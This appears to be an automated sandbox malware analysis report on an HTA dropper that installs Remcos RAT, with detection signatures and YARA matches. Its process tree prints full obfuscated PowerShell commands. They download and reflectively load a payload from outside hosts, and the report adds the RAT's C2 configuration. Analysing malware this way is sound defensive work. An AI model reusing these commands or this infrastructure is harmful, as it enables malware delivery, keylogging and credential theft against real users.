Edit tour
Windows
Analysis Report
sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
Overview
General Information
Detection
Cobalt Strike, Remcos, HTMLPhisher
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7420 cmdline:
mshta.exe "C:\Users\ user\Deskt op\sweetba bygivenbes tthignsetn irelifegiv enbackbest thignsalwa ys.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 7492 cmdline:
"C:\Window s\sysTEm32 \WInDowSpo WeRShell\V 1.0\POwers heLL.exE" "powErsHEl l.eXE -EX BYpaSs -noP -W 1 -C dEViCEcR eDEntIaLDE ployMENt ; IeX($(i EX('[SYsTe m.tExT.EnC oDINg]'+[C hAR]0x3a+[ ChaR]0x3a+ 'utF8.GeTS TrING([Sys tEM.cOnvER t]'+[CHAR] 0x3a+[cHAR ]58+'FrOMb ASe64STrIN G('+[CHAr] 34+'JFM1UF piNiAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgID0g ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBhZEQtVH lwZSAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIC1N RW1iZVJERU ZpTkl0aU9u ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgJ1tEbG xJbXBvcnQo InVyTE1PTi 5EbGwiLCAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IENoYXJTZX QgPSBDaGFy U2V0LlVuaW NvZGUpXXB1 YmxpYyBzdG F0aWMgZXh0 ZXJuIEludF B0ciBVUkxE b3dubG9hZF RvRmlsZShJ bnRQdHIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BaLHN0cmlu ZyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIGhwSG hsTndBLHN0 cmluZyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIF RSdEdKUEJ0 ZSx1aW50IC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgaEFVYVRQ USxJbnRQdH IgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBjTWFR eEFTWWhsSy k7JyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIC1O QU1FICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIn haQm5VRSIg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAtTmFNRX NQYWNlICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg Q0NzVWlPTk lmICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgLVBh c3NUaHJ1Oy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICRTNVBa YjY6OlVSTE Rvd25sb2Fk VG9GaWxlKD AsImh0dHA6 Ly8xMDQuMT Y4LjQ2LjI2 LzE0MjIvYm VzdG9mdGhp bmdzd2l0aG VudGlyZXRp bWVnaXZlbm Vic3R0aGln bnN0b2Rvd2 l0aGdyZWF0 LnRJRiIsIi RFblY6QVBQ REFUQVxiZX N0b2Z0aGlu Z3N3aXRoZW 50aXJldGlt ZWdpdmVuZW JzdHRoaWdu c3RvZG93aX RoZy52QnMi LDAsMCk7U3 RhclQtc2xF RVAoMyk7SW kgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAiJGVu VjpBUFBEQV RBXGJlc3Rv ZnRoaW5nc3 dpdGhlbnRp cmV0aW1lZ2 l2ZW5lYnN0 dGhpZ25zdG 9kb3dpdGhn LnZCcyI='+ [cHaR]0x22 +'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7500 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7624 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -EX BYpaSs -noP -W 1 -C dEViCE cReDEntIaL DEployMENt MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 7760 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\blaytqul \blaytqul. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 7776 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SF818.tmp" "c:\Users \user\AppD ata\Local\ Temp\blayt qul\CSC682 4B6AE21FF4 F1D9A4E956 62E7FF991. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 7864 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\besto fthingswit hentiretim egivenebst thignstodo withg.vBs" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 7916 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnMmtkaW 1hZycrJ2VV cmwgPSBlQz RodHRwczov LzMxMDUuZm lsZW1haWwu Y29tL2FwaS 9maWxlLycr J2dldD9maW xla2V5PXMn KydoVFBIYk NQWDhvLWxP dENxSExHNl 8weEN5LXhs NHRueGxBVm JROTUtJysn ZHZpVEs1Y0 FSYU5kUWpi YjNtZXhmd1 F6S21UWGcm c2tpcHJlZz 10cnVlJnBr X3ZpZD1lMD EwOTYzOGM5 YmZiOTU3MT czMjUzMTMw OWI1ZmY3Yy BlQzQ7Mmtk d2ViQ2xpZW 50ID0gTmV3 LU9iamVjdC BTeXN0ZW0u TmV0LldlYk NsaWVudDsy a2RpbWFnZU J5dGVzID0g Mmtkd2ViQ2 xpZW50LkRv dycrJ24nKy dsb2FkRGF0 YSgya2RpbW FnZVVybCk7 MmtkaW1hZ2 VUZXh0ID0g JysnW1N5c3 RlbS5UZScr J3h0LkVuY2 9kaW5nXTo6 VVRGOC5HZX RTdHJpbmco MmtkaW1hZ2 VCeXRlcycr Jyk7Mmtkc3 RhcnRGbGFn ID0gZUM0PD xCQVNFNjRf U1RBUlQ+Pm VDJysnNDsy a2RlbmRGbG FnID0gZUM0 PDxCQVNFNj RfRU5EPj5l QzQ7Mmtkc3 RhcnRJbmRl eCA9IDJrZG ltYWdlVGV4 dC5JbmRleE 9mKDJrZHN0 YXJ0RmxhZy k7MmtkZScr J24nKydkSW 5kZXggPSAy a2RpbWFnZV RleHQuSW5k ZXgnKydPZi gya2RlbmRG bGEnKydnKT sya2RzdGFy dEluZGV4IC 1nZSAwIC1h bmQgMmtkZW 5kSW5kZXgg LWd0IDJrZH N0YXInKyd0 SW5kZXg7Mm tkc3RhcnRJ bmRleCArPS Aya2RzdGFy dEZsYWcuTG VuZ3QnKydo OzJrZGJhc2 U2NExlbmd0 aCA9IDJrZG VuZEluZGV4 IC0gMmtkc3 RhcnRJbmRl eDsya2RiYX NlNjRDb21t YW5kID0gMm snKydkaW1h Z2VUJysnZX h0LlN1YnN0 cmluZygya2 RzdGFydElu ZGV4LCAya2 RiYXNlNjRM ZW5ndGgpOz JrZGJhc2U2 NFJlJysndm Vyc2VkID0g LWpvaW4gKD JrZGJhc2U2 NENvbW1hbm QuVG9DaGFy QXJyYXkoKS BzeVYgRm9y RWFjaC1PYm plY3QgeyAy a2RfIH0pWy 0xLi4tKDJr ZGJhc2U2NE NvbW1hbmQu TGVuZ3RoKV 07MmtkY29t bWFuZEJ5dG VzID0gW1N5 c3RlbS5Db2 52ZXJ0XTo6 RnJvbUJhcy crJ2U2NFN0 cmluZygya2 RiYXNlNjRS ZXZlcnNlZC k7MmtkbG9h ZGVkQXNzZW 1ibHkgPSBb U3lzdGVtLl JlZmxlY3Rp b24uQXNzZW 1ibHldOjpM b2FkKDJrZG NvbW1hbmRC eXRlcyk7Mm tkdmFpTWV0 aG9kID0gW2 RubGliLklP LkhvbWVdLk dldE1ldGhv ZChlQzRWQU llQzQpOzJr ZHZhaU1ldG hvZC5JbnZv a2UoJysnMm tkbnVsbCwg QChlQzR0eH QuRkdWR0ZS LzIyNDEvNj IuNjQuOCcr JzYxLjQwMS 8vOnB0dGhl QzQsIGVDNG Rlc2F0aXZh ZG9lQzQsIG VDNGRlc2F0 aXZhZG9lQz QsIGVDNGRl c2F0aXZhZG 9lQzQsJysn IGVDNENhc1 BvbGVDNCwg ZUM0ZGVzYX RpdmFkb2VD NCwgZUM0ZG VzYXRpdmFk b2VDNCxlQy crJzRkZXNh dGl2YWRvJy snZUM0LGVD NGRlc2F0aS crJ3ZhZG9l QzQsZUM0ZG VzYXRpdmFk b2VDNCxlQz RkZXNhdGl2 YWRvZUM0LG VDNGRlc2F0 aXZhZG9lQy crJzQsZUM0 MWVDNCxlQz RkZXNhdGl2 YWRvZUM0KS k7JykgIC1j cmVwbEFDZS AgKFtjaEFS XTExNStbY2 hBUl0xMjEr W2NoQVJdOD YpLFtjaEFS XTEyNCAgLV JlUExBY2Ug IChbY2hBUl 01MCtbY2hB Ul0xMDcrW2 NoQVJdMTAw KSxbY2hBUl 0zNiAtY3Jl cGxBQ2UnZU M0JyxbY2hB Ul0zOSl8IC 4oKGd2ICcq TURyKicpLk 5BTWVbMywx MSwyXS1qT2 lOJycp';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7924 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8032 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('2k dimag'+'eU rl = eC4ht tps://3105 .filemail. com/api/fi le/'+'get? filekey=s' +'hTPHbCPX 8o-lOtCqHL G6_0xCy-xl 4tnxlAVbQ9 5-'+'dviTK 5cARaNdQjb b3mexfwQzK mTXg&skipr eg=true&pk _vid=e0109 638c9bfb95 7173253130 9b5ff7c eC 4;2kdwebCl ient = New -Object Sy stem.Net.W ebClient;2 kdimageByt es = 2kdwe bClient.Do w'+'n'+'lo adData(2kd imageUrl); 2kdimageTe xt = '+'[S ystem.Te'+ 'xt.Encodi ng]::UTF8. GetString( 2kdimageBy tes'+');2k dstartFlag = eC4<<BA SE64_START >>eC'+'4;2 kdendFlag = eC4<<BAS E64_END>>e C4;2kdstar tIndex = 2 kdimageTex t.IndexOf( 2kdstartFl ag);2kde'+ 'n'+'dInde x = 2kdima geText.Ind ex'+'Of(2k dendFla'+' g);2kdstar tIndex -ge 0 -and 2k dendIndex -gt 2kdsta r'+'tIndex ;2kdstartI ndex += 2k dstartFlag .Lengt'+'h ;2kdbase64 Length = 2 kdendIndex - 2kdstar tIndex;2kd base64Comm and = 2k'+ 'dimageT'+ 'ext.Subst ring(2kdst artIndex, 2kdbase64L ength);2kd base64Re'+ 'versed = -join (2kd base64Comm and.ToChar Array() sy V ForEach- Object { 2 kd_ })[-1. .-(2kdbase 64Command. Length)];2 kdcommandB ytes = [Sy stem.Conve rt]::FromB as'+'e64St ring(2kdba se64Revers ed);2kdloa dedAssembl y = [Syste m.Reflecti on.Assembl y]::Load(2 kdcommandB ytes);2kdv aiMethod = [dnlib.IO .Home].Get Method(eC4 VAIeC4);2k dvaiMethod .Invoke('+ '2kdnull, @(eC4txt.F GVGFR/2241 /62.64.8'+ '61.401//: pttheC4, e C4desativa doeC4, eC4 desativado eC4, eC4de sativadoeC 4,'+' eC4C asPoleC4, eC4desativ adoeC4, eC 4desativad oeC4,eC'+' 4desativad o'+'eC4,eC 4desati'+' vadoeC4,eC 4desativad oeC4,eC4de sativadoeC 4,eC4desat ivadoeC'+' 4,eC41eC4, eC4desativ adoeC4));' ) -creplAC e ([chAR]1 15+[chAR]1 21+[chAR]8 6),[chAR]1 24 -RePLAc e ([chAR]5 0+[chAR]10 7+[chAR]10 0),[chAR]3 6 -creplAC e'eC4',[ch AR]39)| .( (gv '*MDr* ').NAMe[3, 11,2]-jOiN '')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - CasPol.exe (PID: 5480 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": ["nextnewupdationsforu.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EC111K", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 17 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 7 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |